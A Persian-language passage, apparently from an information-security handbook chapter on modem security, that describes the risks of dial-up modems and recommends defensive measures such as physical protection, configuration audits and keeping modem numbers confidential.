‫ﺩﺭ ﻣﺮﺣﻠﺔ ﻓﻌﻠﻲ ﺍﺯ ﺭﺷﺪ ﺟﻬﺎﻧﻲ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻫﻨﻮﺯ ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺗﻮﺟﻪ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺮﺗﺒﻂ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﺳﺎﺩﻩ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺁﻥ ﻧﻴﺰ ﻛﻢﻫﺰﻳﻨﻪ ﺍﺳﺖ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ؛ ﺁﻧﭽﻨـﺎﻥ‬
‫ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻣﺪﺕ ﻳﻚ ﺩﻫﻪ ﻳﺎ ﺣﺘﻲ ﺑﻴﺶ ﺍﺯ ﺁﻥ ﺩﺭﺣﺎﻝ ﻛﺎﺭ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺣﺘﻲ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳﺘﺮﺳﻲ ﻭﺳﻴﻊ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ‬
‫ﻣﺤﻠﻲ ﻭ ﺍﺗﺼﺎﻻﺕ ﭘﺮﺳﺮﻋﺖ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻻﻳﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﺓ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺷـﺒﻜﻪ ﺑـﺎ ﺍﺗـﺼﺎﻻﺕ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﺩﻡ ﻫﺪﺍﻳﺖ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻨﺪ ﺩﺭ ﻣﻨﺰﻝ ﭘﺲ ﺍﺯ ﺳﺎﻋﺖ ﺍﺩﺍﺭﻱ ﻭ ﻳﺎ ﺩﺭ ﺗﻌﻄـﻴﻼﺕ ﺁﺧـﺮ ﻫﻔﺘـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﻳﻚ ﻣﻮﺩﻡ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻳﺸﺎﻥ ﻓﺮﺍﻫﻢ ﺳﺎﺯﺩ‪ .‬ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺭﺍﻫﺒﺮﺍﻥ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺎ‬
‫ﻼ ﺑـﻪ ﻳـﻚ‬ ‫ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺑﺎ ﺷﺒﻜﺔ ﻣﻮﺭﺩ ﻧﻈﺮ‪ ،‬ﺁﻧﺮﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﺭﺍﻫﺒﺮﻱ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻭﻗﺘﻲ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ ﻣـﺜ ﹰ‬
‫ﺭﻭﺳﺘﺎ ﻫﻢ ﺳﻔﺮ ﻛﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﺧﺼﻮﺻﹰﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺧـﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ‬
‫ﺳﻄﺢ ﻣﻠﻲ ﻫﻨﻮﺯ ﺍﺭﺍﺋﻪ ﻧﺸﺪﻩ ﻭ ﻳﺎ ﺍﮔﺮ ﻫﻢ ﺍﺭﺍﺋﻪ ﺷﺪﻩ‪ ،‬ﺍﻳﻤﻦ ﻧﻴﺴﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻻ ﺑﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ‬‫ﻋﻠﻴﺮﻏﻢ ﻫﻤﺔ ﺍﻳﻦ ﻣﺰﺍﻳﺎ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﻣﺨﺎﻃﺮﺍﺕ ﻓﺮﺍﻭﺍﻧﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺮﺩﻡ ﻣﻌﻤﻮ ﹰ‬
‫ﻋﺒﻮﺭ ﺧﻮﺩ ﺍﺯ ﻣﻮﺩﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻮﺩﻡ ﻭ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺁﻥ ﺑﺪﺭﺳﺘﻲ ﻧﺼﺐ ﺷـﺪﻩﺍﻧـﺪ‪ ،‬ﺻـﺤﻴﺢ‬
‫ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺩﻗﻴﻘﹰﺎ ﺁﻧﭽﻪ ﻛﻪ ﺷﻤﺎ ﺍﻧﺘﻈﺎ ﹺﺭ ﺁﻧﺮﺍ ﺩﺍﺭﻳﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﺁﻧﺎﻟﻮﮒ ﺳﺎﺩﻩ ﻭ ﻳﺎ ﺣﺘﻲ ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺑﺮﻗﺮﺍﺭ ﺷﻮﺩ‪ ،‬ﻳﻚ ﻓﺮﺩ ﻣﻌﻤﻮﻟﻲ ﻓﺎﻗﺪ ﺑﺪﻭﻥ ﺩﺍﻧـﺶ ﻳـﺎ ﻣﺠـﻮﺯ ﺧـﺎﺹ ﺍﺯ ﻣـﺪﻳﺮﻳﺖ‬
‫ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﺑﺴﺎﺩﮔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﻣﻮﺩﻡ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻫﺔ ‪ ١٩٦٠‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ ،‬ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺩﺭ ﺩﻫﺔ ‪ ١٩٧٠‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓـﺖ‪ ،‬ﻭ‬
‫ﺩﺭ ﺩﻫﻪﻫﺎﻱ ‪ ١٩٨٠‬ﻭ ‪ ١٩٩٠‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻋﻤﻮﻣﻴﺖ ﻳﺎﻓﺖ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻣﻮﺩﻣﻬﺎ ﻫﻨﻮﺯ ﻫﻢ ﻭﺍﺟﺪ ﺟﺎﻳﮕﺎﻩ ﻣﻬﻤﻲ ﺩﺭ ﭼـﺸﻢﺍﻧـﺪﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺍﻣﺮﻭﺯ ﻫﺴﺘﻨﺪ‪ .‬ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﺑﺎ ﻳﺎﻓﺘﻦ ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﺑﺪﺭﺳﺘﻲ ﺍﻣﻦ ﻧﺸﺪﻩﺍﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺳـﺎﻳﺮ ﺟﻬـﺎﺕ ﻣـﻮﺭﺩ‬
‫ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻔﻮﺫ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﻳﺪ ﺑﺎ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺩﻣﻬﺎ ﺁﺷﻨﺎ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٧٨‬‬

‫ﺍﻣﻨﻴﺖ ﻣﻮﺩﻣﻬﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﻣﻮﺟﺐ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﺟﻬﺎﻥ ﺧـﺎﺭﺝ ﺍﺯ ﺁﻥ ﺍﻳﺠـﺎﺩ ﺍﺭﺗﺒـﺎﻁ ﻛﻨـﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻓﺮﺍﺩ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﺑﺮﺍﻱ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻭ ﻣﺤﺮﻣﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻭ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺍﮔﺮ ﻣﻮﺩﻣﻬﺎﻱ ﺷﻤﺎ ﻗﺎﺑﻞ ﺗﺨﺮﻳﺐ ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﺠـﺪﺩ ﺑﺎﺷـﻨﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﻤﻨﻈﻮﺭ ﮔﻤﺮﺍﻩ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻓﺸﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺁﻧﻬﺎ ﺑﻜﺎﺭ ﺭﻭﻧﺪ؛ ﻭ ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺍﻃﻼﻋـﺎﺕ ﺍﻧﺘﻘـﺎﻟﻲ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﻣﻮﺩﻡ ﺭﺍ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻋﻠﻴﺮﻏﻢ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻣﻮﺩﻣﻬﺎ ﻫﻨﻮﺯ ﻭﺳﻴﻠﺔ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻟﻴﻞ ﺳﺎﺩﺓ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬
‫ﻻ ﻣﻮﺩﻣﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻳـﺎ‬
‫ﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺷﺪﺕ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﺮﭼﻨﺪ ﺷﺮﻛﺘﻬﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺒﻜﻪﺍ ﹺ‬
‫ﻣﻤﻴﺰﻱ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻛﺜﺮ ﺭﺳﺎﻧﺪﻥ ﺿﺮﻳﺐ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻣﻮﺩﻣﻬﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺭﺍﻫﺒﺮﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﮔﺎﻡ ﺍﻭﻝ‪ ،‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﻣﻮﺩﻡ ﺍﺳﺖ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﻮﺩﻣﻬﺎ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻣﻜـﺎﻥ ﺍﻣﻨـﻲ ﻗـﺮﺍﺭ ﺩﺍﺭﻧـﺪ‪ ،‬ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪ .‬ﻫﺪﻑ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﺣﻔﺎﻇﺖ‪ ،‬ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﻭ ﺗﻐﻴﻴﺮ ﺍﺗـﺼﺎﻻﺕ ﻣﻮﺩﻣﻬـﺎ ﺍﺳـﺖ‪ .‬ﺑـﺎ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﻣﻨﺎﺳﺐ ﺑﻪ ﺑﻌﻀﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼـﻚ ﺭﺍ ﺩﺳـﺘﻜﺎﺭﻱ ﻭ ﺳـﭙﺲ‬
‫ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﺠﺪﺩ ﻛﺮﺩ‪ ،‬ﻭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﻭﻗﻮﻉ ﭼﻨﻴﻦ ﻣﺴﺎﺋﻠﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﮔﺰﻳﻨﻪﻫـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻮﺩﻡ )ﺩﺭﺻـﻮﺭﺕ‬
‫ﻭﺟﻮﺩ( ﻳﺎﺩﺩﺍﺷﺖ ﺑﺮﺩﺍﺭﻳﺪ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﻧﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﻧﺸﺪﻥ ﺁﻧﻬﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺩﻣﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﺁﺯﻣﺎﻳﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺍﻧﺠـﺎﻡ ﺗﻐﻴﻴـﺮﺍﺕ ﺑـﺮﺍﻱ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺍﺩﺍﺭﺍﺕ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﺳﺎﺩﻩﺗﺮ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻧﻴـﺰ‬
‫ﺁﺳﺎﻧﺘﺮ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺍﮔﺮ ﭼﻨﻴﻦ ﻭﻳﮋﮔﻴﻬﺎﻳﻲ ﺩﺭ ﻣﻮﺩﻡ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﺓ ﺧﺎﺻـﻲ ﻧﻤـﻲﻛﻨﻴـﺪ‪ ،‬ﺣﺘﻤـﹰﺎ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺟﻨﺒﺔ ﻣﻬﻢ ﺩﻳﮕﺮﻱ ﺍﺯ ﺣﻔﺎﻇﺖ ﻣﻮﺩﻣﻬﺎ‪ ،‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺑﺎ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻣﻬﺎ ﻣﺎﻧﻨﺪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩ ﻛﻨﻴـﺪ‬
‫ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﻲ ﺟﺰ ﻛﺴﺎﻧﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪ .‬ﻋﻤﻮﻣﻲ ﻛﺮﺩﻥ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻣﻬﺎ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺍﺳـﺘﻔﺎﺩﺓ ﻣﻬﺎﺟﻤـﺎﻥ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻲ ﺷﻤﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﺩﺍﺭﺩ ﻛﻪ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻡ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ‬
‫ﺩﻫﻴﺪ‪ ،‬ﺣﺘﻤﹰﺎ ﺑﺼﻮﺭﺕ ﺳﺎﻟﻴﺎﻧﻪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﻭ ﺑﺮﺍﻱ ﻣﻮﺩﻣﻬﺎ ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﻴﺪ ﻛﻪ ﭘﻴﺸﻮﻧﺪ ﻣـﺸﺘﺮﻙ ﺑـﺎ ﺷـﻤﺎﺭﻩ‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﻋﺎﺩﻱ ﺳﺎﺯﻣﺎﻧﺘﺎﻥ ﻧﺪﺍﺭﻧﺪ ﻭ ﻟﺬﺍ ﺍﺣﺘﻤﺎﻝ ﺣﺪﺱ ﺯﺩﻩ ﺷﺪﻥ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﺎﺯﻝ ﺍﺳﺖ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻣﻬﺎ ﺭﺍ ﻣﻄﻠﻘﹰﺎ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻪ ﺩﺍﺷﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺣﺘﻲ ﺍﮔﺮ ﺷﺪﻳﺪﹰﺍ ﺍﺯ ﺍﻳﻦ ﺷﻤﺎﺭﻩﻫﺎ ﻣﺮﺍﻗﺒﺖ ﻛﻨﻴﺪ‪ ،‬ﺑﺎﺯﻫﻢ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺎ ﮔﺮﻓﺘﻦ ﺗﻤﺎﻡ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻣﻨﻄﻘﺔ ﺷﻤﺎ‪ ،‬ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧـﺴﺖ‬
‫ﻱ ﺻﺮﻑ‪ ،‬ﺭﺍﻩﺣﻞ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻣﺨﺎﻃﺮﻩ ﻧﻴـﺴﺖ ﻭ ﻣﻮﺩﻣﻬـﺎ ﻧﻴﺎﺯﻣﻨـﺪ‬ ‫ﺷﻤﺎﺭﻩﻫﺎﻱ ﻣﻮﺩﻣﻬﺎﻱ ﺷﻤﺎ ﺑﻴﺎﺑﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﭘﻨﻬﺎﻥﻛﺎﺭ ﹺ‬
‫ﺣﻔﺎﻅ ﻣﺤﻜﻢﺗﺮﻱ ﻫﺴﺘﻨﺪ‪.‬‬

‫‪Banner‬ﻫﺎ‬
‫‪ Banner‬ﭘﻴﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﻳﻚ ﻣﻮﺩﻡ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺗﻮﺳﻂ ﺁﻥ ﻣﻮﺩﻡ )ﻳﺎ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻮﺩﻡ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﺍﺳﺖ( ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ‬
‫ﻣﻲﺁﻳﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ‪banner‬ﻫﺎ ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﭼﻴﺰﻱ ﺗﺎﻳﭗ ﻛﻨﺪ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺯﻣﺎﻧﻲ ﺑـﻪ ﻧﻤـﺎﻳﺶ ﺩﺭ‬
‫ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﮔﺮﺩﺩ‪.‬‬
‫‪Banner‬ﻫﺎ ﺑﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﮔﺎﻥ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﻣﺘﺼﻞ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻛـﺎﺭﺑﺮﺩ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑﻬﺒـﻮﺩ‬
